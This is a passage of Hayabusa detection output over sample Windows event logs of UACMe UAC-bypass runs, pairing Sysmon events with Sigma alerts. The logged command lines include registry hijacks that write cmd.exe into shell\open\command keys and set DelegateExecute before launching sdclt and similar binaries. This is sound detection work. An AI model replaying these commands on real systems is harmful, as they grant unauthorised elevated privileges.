| PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901 | Hash: SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | LID: 0x18d3b3 | PID: 5396 | PGUID: 747F3D96-A357-5D45-0000-0010BD149A01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx 2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 41 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 
2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 00000280644BB040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1080 | PGUID: 747F3D96-A54E-5D45-0000-0010D507A101,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x18d3b3 | PID: 1716 | PGUID: 747F3D96-A54F-5D45-0000-0010D83FA101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 00:16:31.875 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx 2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 43 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,Evas | 
PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 0000028064468040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1412 | PGUID: 747F3D96-88AA-5D46-0000-00101C9F7D03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 330 000002806444C490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6488 | PGUID: 747F3D96-88AA-5D46-0000-001059C57D03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} | LID: 0x18d3b3 | PID: 4300 | PGUID: 747F3D96-88AB-5D46-0000-001081ED7D03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object 
Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 16:26:36.239 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx 2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-45 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\exefile\shell\open\command\(Default): c:\Windows\SysWOW64\notepad.exe | Process: C:\Windows\explorer.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell 
Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5980 | PGUID: 747F3D96-9DB0-5D46-0000-0010AE65AF03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\ChangePk.exe"" | Process: C:\Windows\System32\changepk.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\slui.exe"" 0x03 | LID: 0x18d3b3 | PID: 2364 | PGUID: 747F3D96-9DB2-5D46-0000-00106DBDAF03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 444 00000280644250C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5208 | PGUID: 747F3D96-9DB4-5D46-0000-0010F825B003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey | Process: 
C:\Windows\System32\SystemSettingsAdminFlows.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel | LID: 0x18d3b3 | PID: 7880 | PGUID: 747F3D96-9DB4-5D46-0000-00105E3CB003",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 17:56:22.267 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx 2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 53 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add 
HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 7312 | PGUID: 747F3D96-A104-5D46-0000-0010C79CBC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:28.893 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:29.060 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-53 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Folder\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3fb | PID: 4512 | PGUID: 
747F3D96-A105-5D46-0000-001071B8BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 300 000002806445E5C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7604 | PGUID: 747F3D96-A105-5D46-0000-001020C0BC03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3b3 | PID: 4532 | PGUID: 747F3D96-A105-5D46-0000-00103BEBBC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,PrivEsc | Evas,High Integrity Sdclt Process,,rules/sigma/process_creation/proc_creation_win_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-A106-5D46-0000-00107201BD03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | LID: 0x18d3b3 | PID: 6604 | PGUID: 747F3D96-A106-5D46-0000-00102425BD03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:35.454 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:57.800 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3296 | PGUID: 747F3D96-A685-5D46-0000-00100D41D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3020 | PGUID: 747F3D96-A686-5D46-0000-00108F56D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.714 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Tgt Process: C:\Windows\system32\msconfig.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5860 | Src PGUID: 747F3D96-A685-5D46-0000-00106442D703 | Tgt PID: 3020 | Tgt PGUID: 747F3D96-A686-5D46-0000-00108F56D703,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 322 000002806447A490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4660 | PGUID: 747F3D96-A686-5D46-0000-00100958D703,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3b3 | PID: 4544 | PGUID: 747F3D96-A686-5D46-0000-0010EA77D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:34:00.871 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:34:01.014 
+09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 56 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: 
